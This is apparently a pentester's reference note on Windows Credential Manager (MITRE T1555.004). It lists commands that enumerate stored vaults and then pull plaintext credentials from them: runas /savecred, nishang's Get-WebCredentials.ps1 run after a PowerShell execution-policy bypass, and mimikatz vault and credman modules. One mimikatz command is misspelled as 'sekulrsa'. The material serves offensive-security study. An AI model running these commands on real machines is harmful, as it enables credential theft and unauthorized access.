Credentials Manager

Resources

1. MITRE ATT&CK

Credentials from Password Stores: Windows Credential Manager, Sub-technique T1555.004 - Enterprise | MITRE ATT&CK®attack.mitre.org

1. Additional resources (The Hacker Recipes)

🛠️ Windows Credential Manager | The Hacker Recipeswww.thehacker.recipes

1. Get-WebCredentials.ps1 (nishang)

nishang/Gather/Get-WebCredentials.ps1 at master · samratashok/nishangGitHub

1. cmdkey

cmdkeyMicrosoftLearn

(1) Enumeration

1.1 vaultcmd

1.1.1 /list

By default, Windows has two vaults: Web and Windows machine credentials. The following command displays the two vaults:

C:\> vaultcmd /list

1.1.2 /listproperties

The following commands will list the properties of the web and windows machine credentials respectively:

C:\> vaultcmd /listproperties:"web credentials"
C:\> vaultcmd /listproperties:"windows credentials"

1.1.3 /listcreds

List more information about the stored credentials (for web and windows machine respectively):

C:\> vaultcmd /listcreds:"web credentials"
C:\> vaultcmd /listcreds:"windows credentials"

1.2 cmdkey

C:\> cmdkey /list

(2) Retrieving/exploiting stored credentials

2.1 runas.exe

We can use the runas.exe command to run commands (eg. cmd.exe) as a particular user with stored credentials.

C:\> runas.exe /savecred /user:<username> <command_to_execute>

# eg. to spawn a command prompt for the username "USER" 
C:\> runas.exe /savecred /user:USER cmd.exe

• /savecred: Indicates if the credentials have been previously saved by this user

  • This option is required to tell runas.exe to pull the stored credentials

2.2 GetWebCredentials.ps1

The vaultcmd and cmdkey commands does not provide methods to show the password. Thus, we have to realy on external PowerShell scripts such as Get-WebCredentials.ps1:

Ensure to run powershell with the bypass policy

C:\> powershell -ep bypass
PS C:\> Import-Module ./Get-WebCredentials.ps1

PS C:\> Get-WebCredentials
UserName  Resource             Password     Properties
--------  --------             --------     ----------
...

2.3 mimikatz

1. sekulrsa::credman

mimikatz # privilege::debug
mimikatz # sekulrsa::credman 

1. vault::list, vault::cred

mimikatz # privilege::debug

mimikatz # vault::list 
mimikatz # vault::cred 

If error is encountered:

mimikatz # token::elevate

Overview of differences between vaultcmd and cmdkey

1. vaultcmd /list

a. Displays both the Web Credentials and Windows Credentials

2. cmdkey /list

a. Displays the credentials stored under Windows Credentials only

b. Displays the entries added via cmdkey /add or runas.exe /savecred commands

c. The output from the vaultcmd /list may overlap with the results from vaultcmd /listcreds